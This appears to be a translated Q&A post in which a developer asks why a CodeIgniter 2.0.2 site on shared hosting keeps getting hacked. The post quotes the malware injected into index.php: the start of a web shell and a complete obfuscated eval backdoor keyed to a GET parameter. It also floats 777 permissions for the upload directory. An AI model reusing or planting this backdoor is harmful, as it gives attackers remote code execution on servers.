我有一个不断被黑客入侵的 codeigniter 2.0.2 项目。主要有两个问题:
- 恶意代码被添加到
index.php
文件的开头 - 流氓文件被添加到服务器
根据主机的说法,没有 FTP 日志表明这些文件已上传。
由于没有与流氓文件相关的 FTP 上传日志 - 这是否意味着它必须是通过网站本身的漏洞利用,例如联系人或上传表单?
该站点位于共享主机上-将其作为同一服务器上的站点的代码也被黑客入侵,这是导致问题的原因吗?
如果我将 index.php 的文件名更改为其他名称会有帮助吗?
由于
index.php
正在修改,我应该将其 CHMOD 为 644 吗?我一直在寻找 codeigniter 项目的建议权限,但还没有任何来源。除了上传/日志目录(777)之外,我在整个站点上都在想 644 - 这听起来好吗?
注入文件顶部的index.php
代码:
<?php if(isset($_GET["t6371n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-
然后是一个带有长编码字符串的长 preg_replace 语句。接下来是第二条语句:
if(isset($_GET["w6914t"])){$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);}
有一个联系表格和一个表格,用户可以使用 CKFinder 2.0.1 上传项目。打算更新一下,看看能不能解决。